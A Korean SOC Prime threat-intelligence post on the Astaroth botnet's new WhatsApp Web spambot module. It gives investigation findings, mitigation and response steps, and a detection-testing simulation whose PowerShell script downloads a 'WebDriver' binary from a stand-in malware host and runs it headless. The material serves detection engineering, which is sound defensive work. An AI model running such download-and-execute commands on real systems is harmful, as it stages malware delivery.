SOC Prime Bias: 높음

30 Jul 2026 15:38 UTC

Astaroth가 이메일 캠페인을 위한 새로운 스팸봇 컴포넌트를 추가하다

Author Photo
SOC Prime Team linkedin icon 팔로우
Astaroth가 이메일 캠페인을 위한 새로운 스팸봇 컴포넌트를 추가하다
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

Astaroth 봇넷 운영자들이 새로운 WhatsApp 웹 스팸봇 컴포넌트를 추가하여 라틴 아메리카 eCrime 생태계 전반에 걸쳐 범위를 확장했습니다. 이 모듈은 헤드리스 브라우저 자동화를 사용하여 손상된 피해자를 배포 노드로 변환하며, 이를 통해 그들의 WhatsApp 연락처에게 악성 메시지를 보냅니다. 이는 전통적인 이메일 스팸에서 소셜 메신저 플랫폼으로의 변화를 의미합니다.

조사

조사에는 Astaroth 스팸봇의 자세한 기술 분석이 포함되었으며, AES-CTS 암호화, 복잡한 6단계 문자열 난독화 과정, 맞춤 구성 구조를 밝혀냈습니다. 연구자들은 Astaroth와 Vareg 스팸봇 간의 상당한 코드 유사성을 식별하여 개발자 간의 공유나 코드 교환 가능성을 시사했습니다. 분석 결과, WebDriver 및 WPPConnect/WA-JS와 같은 합법적인 브라우저 자동화 프레임워크를 악용하여 숨겨진 스팸 캠페인을 실행하는 것이 확인되었습니다.

완화

조직은 사용자를 WhatsApp 기반의 사회 공학 공격에 대해 교육하고, 알 수 없는 연락처로부터 받은 파일의 열기나 실행을 막아야 합니다. 브라우저 다운로드 보호 기능을 활성화하고, 승인되지 않은 WebDriver 다운로드 및 실행을 면밀히 모니터링해야 합니다. 보안 팀은 Windows Temp 폴더 내의 의심스러운 디렉터리 생성을 감시하고, 합법적인 비즈니스 목적에 필요하지 않은 경우 WPPConnect/WA-JS를 차단하는 것을 고려해야 합니다.

대응

Astaroth 활동이 감지되면, 영향을 받은 엔드포인트는 즉시 격리하여 추가적인 스팸 확산과 멀웨어 전달을 중단해야 합니다. 조사자들은 헤드리스 브라우저 프로세스와 비정상적인 ChromeAuto_ 디렉터리를 C:UsersPublicTemp내에서 검색해야 하며 확인된 WebDriver 프로세스는 포렌식 분석을 받고, 네트워크 활동은 Astaroth C2 인프라에 대한 승인되지 않은 연결이 있는지 검토해야 합니다.

공격 흐름

시뮬레이션 실행

전제 조건: Telemetry & Baseline Pre-flight Check가 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 트리거하기 위한 적의 기술(TTP)의 정확한 실행을 설명합니다. 명령 및 서사는 식별된 TTP를 직접 반영하며 탐지 논리에서 기대되는 정확한 텔레메트리를 생성하는 것을 목표로 합니다. 추상적이거나 관련 없는 예는 오진을 초래할 수 있습니다.

  • 공격 서사 및 명령: 적들은 자동화된 WhatsApp 스팸 모듈을 배포할 의도가 있습니다. 이를 위해 처음에 PowerShell을 활용한 living-off-the-land 기술을 사용하여 특정 WebDriver 바이너리를 로컬 디렉터리에 다운로드합니다. 도구가 준비되면, 적들은 해당 바이너리를 --headless and --disable-infobars 플래그를 사용하여 실행합니다. 이는 자동화가 사용자에게 보이지 않게 백그라운드에서 실행되어 스팸 캠페인을 진행하면서 호스트에 대한 영향을 최소화할 수 있도록 합니다.

  • 회귀 테스트 스크립트:

    # Astaroth 스팸봇 시뮬레이션 스크립트
    # 이 스크립트는 탐지 규칙에 정의된 다운로드 및 실행 순서를 시뮬레이션합니다.
    
    $workDir = "$env:TEMPWebDriverSimulation"
    if (!(Test-Path $workDir)) { New-Item -Path $workDir -ItemType Directory }
    Set-Location $workDir
    
    # 1. 다운로드 시뮬레이션 (선택_webdriver_download 트리거)
    Write-Host "[+] PowerShell을 통한 WebDriver 다운로드 시뮬레이션..."
    $dummyWebDriver = "WebDriver.exe"
    New-Item -Path $dummyWebDriver -ItemType File
    # 규칙이 찾는 명령줄을 모의합니다.
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://fake-malware-site.com/WebDriver' -OutFile 'WebDriver.exe'"
    
    # 2. 실행 시뮬레이션 (선택_webdriver_execution 및 선택_session_creation 트리거)
    Write-Host "[+] 헤드리스 플래그와 함께 WebDriver 실행 시뮬레이션..."
    # 프로세스 생성 이벤트로 명령줄이 캡처되도록 Start-Process를 사용합니다.
    Start-Process -FilePath ".$dummyWebDriver" -ArgumentList "--headless", "--disable-infobars" -NoNewWindow
  • 정리 명령:

    # 시뮬레이션 아티팩트 정리
    Remove-Item -Path "$env:TEMPWebDriverSimulation" -Recurse -Force
    Write-Host "[+] 정리 완료."